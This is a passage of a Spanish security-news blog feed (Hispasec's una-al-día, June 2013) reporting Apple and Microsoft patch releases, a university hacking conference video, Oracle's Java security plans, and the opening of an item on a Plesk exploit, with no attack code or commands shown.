&lt;br /&gt;&lt;/div&gt;
&lt;div align="right" class="MsoNormal" style="text-align: right;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div align="right" class="MsoNormal" style="text-align: right;"&gt;
Sergio de los Santos&lt;/div&gt;
&lt;div align="right" class="MsoNormal" style="text-align: right;"&gt;
&lt;a href="mailto:ssantos@hispasec.com"&gt;ssantos@hispasec.com&lt;/a&gt;&lt;/div&gt;
&lt;div align="right" class="MsoNormal" style="text-align: right;"&gt;
Twitter: &lt;a href="http://www.twitter.com/ssantosv"&gt;@ssantosv&lt;/a&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/hispasec/zCAd/~4/IPtXT0c8P1o" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/hispasec/zCAd/~3/IPtXT0c8P1o/avanzado-malware-para-android-aprovecha.html</link><author>noreply@blogger.com (Hispasec)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/-EWmD65wo81U/T7QquWn-AtI/AAAAAAAAAds/7PUlz-GyaSw/s72-c/android-logo.png" height="72" width="72" /><thr:total>1</thr:total><feedburner:origLink>http://unaaldia.hispasec.com/2013/06/avanzado-malware-para-android-aprovecha.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-9000895764691586838.post-3174803188621329285</guid><pubDate>Mon, 10 Jun 2013 14:53:00 +0000</pubDate><atom:updated>2013-06-10T22:16:40.062+02:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">software</category><category domain="http://www.blogger.com/atom/ns#">Safari</category><category domain="http://www.blogger.com/atom/ns#">Apple</category><category domain="http://www.blogger.com/atom/ns#">Mac OS X</category><title>Apple publica la versión de 10.8.4 de OS X y corrige varias vulnerabilidades</title><description>&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;span style="font-size: 13pt;"&gt;Apple
ha publicado una actualización de seguridad para su familia de sistemas
operativos OS X junto a la nueva versión 10.8.4 del sistema. Entre otras
mejoras, &lt;/span&gt;&lt;b style="font-size: 13pt;"&gt;soluciona un total de 33
vulnerabilidades&lt;/b&gt;&lt;span style="font-size: 13pt;"&gt; en varios de sus componentes. Su navegador Safari también
se actualiza a la versión 6.0.5 y soluciona 26 fallos de seguridad.&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-fuLSxea0CWg/UbXtvPI-AMI/AAAAAAAACmw/-z2PieHthlk/s1600/OS_X_Logo.png" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;img border="0" src="http://1.bp.blogspot.com/-fuLSxea0CWg/UbXtvPI-AMI/AAAAAAAACmw/-z2PieHthlk/s1600/OS_X_Logo.png" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
La actualización está disponible
para los sistemas Mac OS X y Lion, ambos con sus correspondientes versiones de
servidor, y Mountain Lion. La mayor parte se debe a actualizaciones de OpenSSL,
12 en total, que pueden permitir la denegación del servicio o la revelación de
la clave privada. También importante son las de Ruby (8 vulnerabilidades), que podrían
permitir la ejecución de código arbitrario, entre otros impactos.&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
También se han solucionado varias
vulnerabilidades en SMB, Quicktime, QuickDraw Manager,CFNetwork, CoreAnimation,
CoreMedia Playback, CUPS, Directory Service y Disk Management.&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
Apple también anuncia que a
partir de esta revisión, las aplicaciones Java Web Start descargadas desde la
red deben estar firmadas para que se permita su ejecución. Si Gatekeeper
(aplicación de seguridad que revisa las aplicaciones que se instalan en el
sistema) detecta que no están correctamente firmadas, bloqueará su ejecución.&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-78ynI9MD950/T1qtvi4DIgI/AAAAAAAAAXE/ys9iioRoUqI/s1600/safari_title.png" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;img border="0" src="http://4.bp.blogspot.com/-78ynI9MD950/T1qtvi4DIgI/AAAAAAAAAXE/ys9iioRoUqI/s1600/safari_title.png" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
Por otro lado, &lt;b&gt;Safari actualiza su versión a la 6.0.5&lt;/b&gt;,
solucionando 26 vulnerabilidades en Webkit para los sistemas Lion, Lion Server
y Mountain Lion. La mayoría de estas pueden provocar una denegación de servicio
y potencial ejecución de código arbitrario debido a la corrupción de la
memoria. Se corrigen, además, fallos que pueden permitir ataques cross-site
scripting.&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;b&gt;&lt;span lang="EN-GB"&gt;Más información:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;span lang="EN-GB"&gt;About the OS X Mountain Lion v10.8.4 Update&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;a href="http://support.apple.com/kb/HT5730"&gt;&lt;span lang="EN-GB"&gt;http://support.apple.com/kb/HT5730&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-GB"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;span lang="EN-GB"&gt;OS X Mountain Lion v10.8.4 and Security Update
2013-002&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;a href="http://support.apple.com/kb/HT5784"&gt;&lt;span lang="EN-GB"&gt;http://support.apple.com/kb/HT5784&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-GB"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;span lang="EN-GB"&gt;Safari 6.0.5&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;a href="http://support.apple.com/kb/HT5785"&gt;&lt;span lang="EN-GB"&gt;http://support.apple.com/kb/HT5785&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-GB"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div align="right" class="MsoNormal" style="text-align: right;"&gt;
Francisco López&lt;/div&gt;
&lt;br /&gt;
&lt;div align="right" class="MsoNormal" style="text-align: right;"&gt;
&lt;a href="mailto:flopez@hispasec.com"&gt;flopez@hispasec.com&lt;/a&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/hispasec/zCAd/~4/3W9IrZQKB4c" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/hispasec/zCAd/~3/3W9IrZQKB4c/apple-publica-la-version-de-1084-de-os.html</link><author>noreply@blogger.com (Hispasec)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/-fuLSxea0CWg/UbXtvPI-AMI/AAAAAAAACmw/-z2PieHthlk/s72-c/OS_X_Logo.png" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://unaaldia.hispasec.com/2013/06/apple-publica-la-version-de-1084-de-os.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-9000895764691586838.post-2757416632662280014</guid><pubDate>Sun, 09 Jun 2013 09:00:00 +0000</pubDate><atom:updated>2013-06-09T11:12:22.376+02:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">TASSI</category><category domain="http://www.blogger.com/atom/ns#">UPM</category><category domain="http://www.blogger.com/atom/ns#">Conferencias</category><title>Publicada en YouTube la séptima conferencia UPM TASSI "Mundo hacking" de D. Román Ramírez</title><description>&lt;div class="MsoNormal" style="text-align: justify;"&gt;
Publicada en YouTube la séptima y última conferencia UPM TASSI "Mundo hacking" de D. Román Ramírez, de Ferrovial y RootedCON&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
Se encuentra disponible en el canal YouTube de &lt;st1:personname productid="la Universidad Politécnica" w:st="on"&gt;la  Universidad Politécnica&lt;/st1:personname&gt; de Madrid la séptima y última conferencia del IX Ciclo UPM TASSI 2013 con el título "&lt;i&gt;Mundo hacking&lt;/i&gt;", impartida en el Campus Sur de esta universidad el 22 de mayo de 2013 por D. Román Ramírez, Ferrovial y RootedCON.&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;a href="http://www.youtube.com/watch?v=jZbLwfQ7aPs"&gt;http://www.youtube.com/watch?v=jZbLwfQ7aPs&lt;/a&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;
&lt;iframe allowfullscreen="" frameborder="0" height="315" src="http://www.youtube.com/embed/jZbLwfQ7aPs" width="560"&gt;&lt;/iframe&gt;&lt;br /&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
En la sección Conferencias TASSI del servidor web de Criptored encontrarás la presentación en pdf y el material sonoro utilizado por el ponente, así como todas las conferencias de este noveno y anteriores ciclos UPM TASSI.&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;a href="http://www.criptored.upm.es/paginas/docencia.htm#TASSI2013"&gt;http://www.criptored.upm.es/paginas/docencia.htm#TASSI2013&lt;/a&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
Acceso a todas las conferencias de 2013 desde el Canal YouTube UPM (más de 10.000 reproducciones en sólo 3 meses)&lt;/div&gt;
&lt;a href="http://www.youtube.com/user/UPM/search?query=TASSI+2013" style="text-align: justify;"&gt;http://www.youtube.com/user/UPM/search?query=TASSI+2013&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div align="right" class="MsoNormal" style="text-align: right;"&gt;
Jorge Ramió&lt;/div&gt;
&lt;div align="right" class="MsoNormal" style="text-align: right;"&gt;
Coordinador Ciclo UPM
TASSI&lt;/div&gt;
&lt;br /&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/hispasec/zCAd/~4/qzMcZLlyQrY" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/hispasec/zCAd/~3/qzMcZLlyQrY/publicada-en-youtube-la-septima-y.html</link><author>noreply@blogger.com (Hispasec)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://img.youtube.com/vi/jZbLwfQ7aPs/default.jpg" height="72" width="72" /><thr:total>1</thr:total><feedburner:origLink>http://unaaldia.hispasec.com/2013/06/publicada-en-youtube-la-septima-y.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-9000895764691586838.post-1073172906253244238</guid><pubDate>Sat, 08 Jun 2013 08:00:00 +0000</pubDate><atom:updated>2013-06-08T10:15:35.538+02:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">software</category><category domain="http://www.blogger.com/atom/ns#">Boletines</category><category domain="http://www.blogger.com/atom/ns#">Microsoft</category><title>Microsoft publicará cinco boletines de seguridad el próximo martes</title><description>&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;span style="font-size: 13pt;"&gt;Como de costumbre, Microsoft ha dado &lt;/span&gt;&lt;a href="http://technet.microsoft.com/en-us/security/bulletin/ms13-jun" style="font-size: 13pt;"&gt;un adelanto de los boletines que serán publicados el próximo martes 11 de junio&lt;/a&gt;&lt;span style="font-size: 13pt;"&gt; en su ciclo de actualizaciones. Serán &lt;/span&gt;&lt;b style="font-size: 13pt;"&gt;cinco boletines&lt;/b&gt;&lt;span style="font-size: 13pt;"&gt; y afectarán a Internet Explorer, Microsoft Windows y Microsoft Office con diferentes impactos.&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-NVyvXJUXUe4/Tufcw3_g15I/AAAAAAAAAGk/Z7GIx5RzUO0/s1600/microsoft_logo.jpg" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;img border="0" height="93" src="http://3.bp.blogspot.com/-NVyvXJUXUe4/Tufcw3_g15I/AAAAAAAAAGk/Z7GIx5RzUO0/s320/microsoft_logo.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
En esta ocasión &lt;b&gt;solo uno de los boletines ha sido calificado como crítico&lt;/b&gt;. Soluciona fallos que podría permitir la ejecución de código remoto y afecta a Internet Explorer en versiones desde la 6 hasta la 10, dependiendo del sistema operativo. El resto de boletines ha sido marcado como importante.&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
El segundo tratará vulnerabilidades que podrían revelar información sensible para Microsoft&amp;nbsp; Windows en las versiones XP, 2003, Vista, 2008 Server, 7 y 8, pero solo en arquitecturas de 32 bits. &lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
Los boletines tercero y cuarto afectan también al sistema operativo Windows, esta vez en sus versiones Vista, Server 2008 (también R2), 7, 8, Server 2012 y RT. Solucionarán problemas que pueden dar lugar a la denegación de servicio y elevación de privilegios, respectivamente.&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
Finalmente, una última actualización tratará vulnerabilidades que podrían desembocar en la ejecución de código remoto, esta vez en Office 2003 y 2011 para Mac.&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
No se sabe si estos boletines corregirán el problema de elevación de privilegios dado a conocer hace poco por Tavis Ormandy y del que existe ya prueba de concepto.&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
Junto con estos boletines, Microsoft también actualizará su herramienta "&lt;i&gt;Microsoft Windows Malicious Software Removal Tool&lt;/i&gt;", disponible desde Windows Update, Microsoft Update, Windows Server Update Services y su centro de descargas.&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;b&gt;Más información:&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;span lang="EN-GB"&gt;Microsoft Security Bulletin Advance Notification for June 2013&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;a href="http://technet.microsoft.com/en-us/security/bulletin/ms13-jun"&gt;&lt;span lang="EN-GB"&gt;http://technet.microsoft.com/en-us/security/bulletin/ms13-jun&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-GB"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div align="right" class="MsoNormal" style="text-align: right;"&gt;
Francisco López&lt;/div&gt;
&lt;div align="right" class="MsoNormal" style="text-align: right;"&gt;
&lt;a href="mailto:flopez@hispasec.com"&gt;flopez@hispasec.com&lt;/a&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/hispasec/zCAd/~4/zXrFmu-9FDQ" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/hispasec/zCAd/~3/zXrFmu-9FDQ/microsoft-publicara-cinco-boletines-de.html</link><author>noreply@blogger.com (Hispasec)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/-NVyvXJUXUe4/Tufcw3_g15I/AAAAAAAAAGk/Z7GIx5RzUO0/s72-c/microsoft_logo.jpg" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://unaaldia.hispasec.com/2013/06/microsoft-publicara-cinco-boletines-de.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-9000895764691586838.post-7655516175872502114</guid><pubDate>Fri, 07 Jun 2013 10:11:00 +0000</pubDate><atom:updated>2013-06-07T12:24:17.264+02:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Java</category><category domain="http://www.blogger.com/atom/ns#">Oracle</category><title>Oracle desvela el futuro de la seguridad de Java en el navegador</title><description>&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;b&gt;&lt;span style="font-size: 13.0pt;"&gt;Oracle se ha pronunciado sobre la
seguridad de Java&lt;/span&gt;&lt;/b&gt;&lt;span style="font-size: 13pt;"&gt; y la gestión de sus
applets. Como responsable de una inmensa mayoría de las infecciones a través
del navegador, &lt;a href="https://blogs.oracle.com/security/entry/maintaining_the_security_worthiness_of"&gt;es
interesante conocer qué planes tiene la compañía para este producto en el
futuro&lt;/a&gt;.&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;a href="http://2.bp.blogspot.com/-w8hjG0CgEXQ/UQgHfsb49pI/AAAAAAAACBc/a3Axkze-Ra8/s1600/java_logo.jpg" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;img border="0" src="http://2.bp.blogspot.com/-w8hjG0CgEXQ/UQgHfsb49pI/AAAAAAAACBc/a3Axkze-Ra8/s1600/java_logo.jpg" /&gt;&lt;/a&gt;Oracle debe tomar cartas en el
asunto. Desde principios de &lt;st1:metricconverter productid="2013 ha" w:st="on"&gt;2013
 ha&lt;/st1:metricconverter&gt; comenzado una estrategia para mejorar la seguridad de
Java en el navegador, pero el tiempo se le echa encima. Además, Oracle es una compañía
que no se caracteriza por dinamizar sus productos. Es muy conservadora y en
seguridad, siempre ha supuesto un considerable desastre que les ha acarreado
una fama de la que les cuesta librarse. &lt;a href="https://blogs.oracle.com/security/entry/maintaining_the_security_worthiness_of"&gt;El
desarrollador jefe de Java, Nandini Ramani, ha escrito un post hablando del
futuro de la seguridad en Java, sus planes y una pequeña valoración del estado
del producto&lt;/a&gt;.&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
Si en 2012 se cerraron 58
vulnerabilidades, en lo que llevamos de 2013 (solo la mitad) ya se han
solucionado 97. Ramani achaca este incremento a que desde la compra del
producto a Sun, Java está ahora sometido a los estrictos estándares de
seguridad de Oracle. De hecho explica que &lt;b&gt;se
están usando más "&lt;i&gt;herramientas
automáticas&lt;/i&gt;" para "&lt;i&gt;abarcar
más código&lt;/i&gt;"&lt;/b&gt; y evitar así que se introduzcan nuevas
vulnerabilidades.&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
Los números no son definitivos
para valorar la seguridad. Como ya se ha mencionado, Chrome en cantidad de
vulnerabilidades corregidas es un desastre pero se puede considerar el
navegador más seguro por otros factores. En este caso el problema es además de
la cantidad, la calidad: &lt;b&gt;fallos graves y
muy relevantes que han sido corregidos muy tarde&lt;/b&gt;, que siguen siendo
tremendamente explotados, que son sencillos de aprovechar por los atacantes, o
que han surgido en forma de 0day. El problema no es que corrija gran cantidad
de fallos (que puede considerarse algo positivo y bien visto) sino que la
"&lt;i&gt;calidad&lt;/i&gt;" de estos fallos
es muy atractiva para los atacantes. &lt;b&gt;De
esos casi 100 fallos en 2013, se explotan activamente muy pocos&lt;/b&gt;, apenas
media docena, que son muy efectivos entre las víctimas.&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&lt;a href="http://3.bp.blogspot.com/-gpPnjSAPA-o/TxlZ2H_lcsI/AAAAAAAAAOE/afRJeCfoLw0/s1600/Oracle_logo1.gif" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;img border="0" height="40" src="http://3.bp.blogspot.com/-gpPnjSAPA-o/TxlZ2H_lcsI/AAAAAAAAAOE/afRJeCfoLw0/s320/Oracle_logo1.gif" width="320" /&gt;&lt;/a&gt;Así que a partir de octubre, &lt;b&gt;Oracle publicará parches de forma coordinada
con el resto de sus productos&lt;/b&gt;. Cuatro veces al año y cada tres meses. Esta
medida va en línea con la que adoptó hace poco y en la que se propuso una nueva
estrategia de numeración de sus versiones. Ramani también afirma lo que ya
veníamos avisando que tendría que pasar tarde o temprano. &lt;b&gt;Terminará por bloquear por defecto los applets no firmados y los
autofirmados&lt;/b&gt;. En Java 7 u21 se introdujo algo positivo: estar firmado ya no
significaba necesariamente salir de la sandbox. Así que siguen peleando en este
aspecto para que la criptografía sea realmente útil en su modelo de seguridad.&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
También parece &lt;b&gt;que van a modificar su pobre modelo de
lista negra de applets&lt;/b&gt;. Se trata de un fichero de texto plano que se
descarga con cada nueva versión. Van a dinamizarlo publicando actualizaciones
diarias. Esto es curioso puesto que hasta ahora, se actualizaba muy de vez en cuando.
Apenas contiene 40 bloqueados en estos momentos y la cifra no ha variado
demasiado en los últimos años. Esto terminará en la activación del Online
Certificate Status Protocol (OCSP) por defecto. Por último, entre otras medidas,
planean un sistema de seguridad que sea más útil para un administrador, y le
permita elegir durante la instalación qué nivel de seguridad proporcionar.&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
En el apartado de servidor,
debido a la mala fama que le está otorgando el Java "&lt;i&gt;de cliente&lt;/i&gt;" en las empresas, &lt;b&gt;separarán claramente el "&lt;i&gt;Server
JRE&lt;/i&gt;" para que los administradores de servidores no tengan miedo de instalar
su parte servidora&lt;/b&gt; debido a los problemas en el plugin (parte cliente), y
reducir así el vector de ataque.&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
Estas son medidas lógicas, cuyas
carencias ya veníamos criticando en una-al-día desde hace tiempo como fallos
básicos en la seguridad en conjunto de Java y los applets. Al menos &lt;b&gt;se muestra la voluntad de cambio&lt;/b&gt;,
aunque sea tarde y en un periodo no determinado (probablemente necesite todo
2013 para realizar estos movimientos).&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;b&gt;&lt;span lang="EN-GB"&gt;Más información:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;span lang="EN-GB"&gt;Maintaining the security-worthiness of Java is
Oracle’s priority&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;a href="https://blogs.oracle.com/security/entry/maintaining_the_security_worthiness_of"&gt;&lt;span lang="EN-GB"&gt;https://blogs.oracle.com/security/entry/maintaining_the_security_worthiness_of&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-GB"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;span lang="EN-GB"&gt;&amp;nbsp;&lt;/span&gt;&amp;nbsp;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div align="right" class="MsoNormal" style="text-align: right;"&gt;
Sergio de los Santos&lt;/div&gt;
&lt;div align="right" class="MsoNormal" style="text-align: right;"&gt;
&lt;a href="mailto:ssantos@hispasec.com"&gt;ssantos@hispasec.com&lt;/a&gt;&lt;/div&gt;
&lt;div align="right" class="MsoNormal" style="text-align: right;"&gt;
Twitter: &lt;a href="http://www.twitter.com/ssantosv"&gt;@ssantosv&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/hispasec/zCAd/~4/FAzrEL50MZs" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/hispasec/zCAd/~3/FAzrEL50MZs/oracle-desvela-el-futuro-de-la.html</link><author>noreply@blogger.com (Hispasec)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/-w8hjG0CgEXQ/UQgHfsb49pI/AAAAAAAACBc/a3Axkze-Ra8/s72-c/java_logo.jpg" height="72" width="72" /><thr:total>1</thr:total><feedburner:origLink>http://unaaldia.hispasec.com/2013/06/oracle-desvela-el-futuro-de-la.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-9000895764691586838.post-6614927563021831474</guid><pubDate>Thu, 06 Jun 2013 11:31:00 +0000</pubDate><atom:updated>2013-06-06T14:09:33.915+02:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Parallels</category><category domain="http://www.blogger.com/atom/ns#">software</category><category domain="http://www.blogger.com/atom/ns#">Plesk</category><title>Vulnerabilidad en Parallels Plesk permite ejecución remota de código</title><description>&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;a href="http://seclists.org/fulldisclosure/2013/Jun/21" style="font-size: 13pt;"&gt;Kingcope ha publicado en la lista Full Disclosure&lt;/a&gt;&lt;span style="font-size: 13pt;"&gt; &lt;/span&gt;&lt;b style="font-size: 13pt;"&gt;un exploit que aprovecha un fallo de configuración en los sistemas Parallels Plesk&lt;/b&gt;&lt;span style="font-size: 13pt;"&gt;. Permite la ejecución remota de código PHP y por tanto, la inyección de comandos en el sistema operativo. El exploit no afecta a las últimas versiones de Plesk (10 y 11), pero sí a &lt;/span&gt;&lt;a href="http://www.parallels.com/support/policy/plesk-lifecycle/" style="font-size: 13pt;"&gt;versiones que han terminado o están a punto de finalizar su ciclo de vida.&lt;/a&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-m8w8QphE-s8/UbBzt0gF1zI/AAAAAAAACmQ/XYqlCTesK9U/s1600/Parallels.PNG" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;img border="0" src="http://4.bp.blogspot.com/-m8w8QphE-s8/UbBzt0gF1zI/AAAAAAAACmQ/XYqlCTesK9U/s1600/Parallels.PNG" height="92" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
